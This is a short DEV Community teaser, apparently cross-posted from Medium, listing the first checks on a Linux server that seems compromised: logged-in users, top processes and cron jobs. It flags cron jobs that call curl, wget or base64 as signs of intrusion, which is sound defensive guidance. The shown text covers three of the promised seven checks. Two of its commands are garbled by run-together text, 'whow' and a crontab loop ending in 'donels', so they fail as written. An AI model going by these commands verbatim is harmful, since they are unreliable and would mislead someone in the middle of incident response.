DEV Community

Faruk
Faruk

Posted on • Originally published at Medium

What I Check First When a Linux Server Starts Acting Suspicious | by Faruk Ahmed | May, 2025

Member-only story

What I Check First When a Linux Server Starts Acting Suspicious

--

Share

✍️ Full Blog Content:

Intro:

Your server’s acting strange — maybe it’s lagging, maybe you’re seeing weird logs, or users are locked out. Before panic sets in, there’s a checklist I run through that helps me figure out what’s happening — fast. These are the first 7 things I check when a Linux server smells even a little bit wrong.

1. Who’s Logged In (Right Now)

whow
Enter fullscreen mode Exit fullscreen mode

✅ Look for:

  • Users logged in that shouldn’t be
  • Multiple logins from odd IPs
  • Sessions active at strange hours

2. What Processes Are Running

ps aux --sort=-%cpu | head
Enter fullscreen mode Exit fullscreen mode

✅ Watch for:

  • Shells or binaries running from /tmp or /dev/shm
  • Long-running scripts
  • Unusual process names (misspelled system commands)

3. Any New Cron Jobs?

for user in $(cut -f1 -d: /etc/passwd); do crontab -l -u $user 2>/dev/null; donels -l /etc/cron* /var/spool/cron
Enter fullscreen mode Exit fullscreen mode

✅ Red flags:

  • Jobs calling curl, wget, or base64

👉 Read Full Blog on Medium Here

Top comments (0)